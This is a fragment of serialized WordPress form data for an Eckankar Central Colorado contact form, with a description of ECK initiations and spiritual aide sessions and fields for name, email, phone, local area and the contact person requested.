ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:1181:\"<p></p>\n<p></p>\n<p></p>\n<h3><span style=\"color: #23507d;\"><strong>Central Colorado Initiator and ESA\'s</strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p>\n<p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>\";s:3:\"key\";s:7:\"html_93\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:285;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:10:\"textbox_94\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:10:\"textbox_94\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";}s:2:\"id\";i:286;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:11:\"lastname_95\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"lastname_95\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";}s:2:\"id\";i:287;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:8:\"email_96\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"email_96\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:288;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"phone_97\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:8:\"phone_97\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:289;}i:5;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_98\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:13:\"listselect_98\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:290;}i:6;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:43:\"Select The Person You Would Like To Contact\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:14:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"0\";}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:44:\"ESA/Initiator-Fred Bell-Denver Metro 